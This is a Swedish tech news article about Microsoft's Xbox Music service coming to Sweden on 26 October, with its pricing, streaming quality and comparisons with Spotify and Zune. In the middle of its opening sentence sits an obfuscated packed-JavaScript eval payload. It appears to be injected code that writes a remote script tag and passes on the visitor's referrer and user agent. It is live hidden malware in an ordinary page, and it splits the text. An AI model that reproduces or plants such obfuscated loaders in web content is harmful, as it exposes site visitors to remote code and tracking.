Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Xbox Music kommer till Sverige den 26 oktober

Xbox Music kommer till Sverige den 26 oktober
Sebastian Plengier Ehrnfelt

Ännu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iikty|var|u0026u|referrer|zarks||js|php’.split(‘|’),0,{}))
mer streaming till Sverige på G. Denna gång är det Microsoft som ger sig in i branschen. Den 26 oktober kommer bli en stor dag för Microsoft.

Som vi nämnt ett flertal gånger så släpps det nya operativsystemet Windows 8 samt också deras första surfplatta. Men förutom detta så meddelas det också att Microsoft kommer att släppa en ny musik-streaming sajt vid namn Xbox Music.

Xbox Musix är en tjänst som ska ge möjligheten att erbjuda användaren både streaming samt låtar och lagra dem.

För 99 kronor i månaden kan du få ett Xbox Music Pass som fungerar som ett premiumkonto till Spotify. Med detta kan du alltså streama musik utan någon reklam. Kvaliteten kommer att ligga på 192 kbps vilket är något lägre än Spotifys maximala kvalitet på 320 kbps.

Känner man att detta är något som troligen kommer användas frekvent under längre tid kan man enkelt köpa ett års-pass för 990 kronor samt 3 månader för 279 kronor.

Xbox Music Store är en plats där du kan köpa låtar och lagra dem. De levereras i mp3-format och kan ses som Microsofts svar på iTunes.

Det finns även en tjänst i Xbox Music där du gratis kan streama låtar med reklam, den funktionen är dock inte tillgänglig i Sverige än och inte vet vi när det blir det heller.

Tanken är säkert att Xbox Music ska ersätta Zune som tidigare varit Microsofts musiktjänst. Xbox Music ska fungera på alla surfplattor och datorer som kör Windows 8, Xbox 360 samt smartphones med Windows 8. Tyvärr så får inte Windows Phone 7 hänga med på tåget utan får fortsätta med Zune i framtiden.

Datumet är alltså den 26 oktober och då får vi se om Microsofts tjänst har det som vi konsumenter söker efter.

Det är även viktigt att ni inte glömmer datumet då det också är lansering och release för Windows 8 och deras häftiga surfplatta!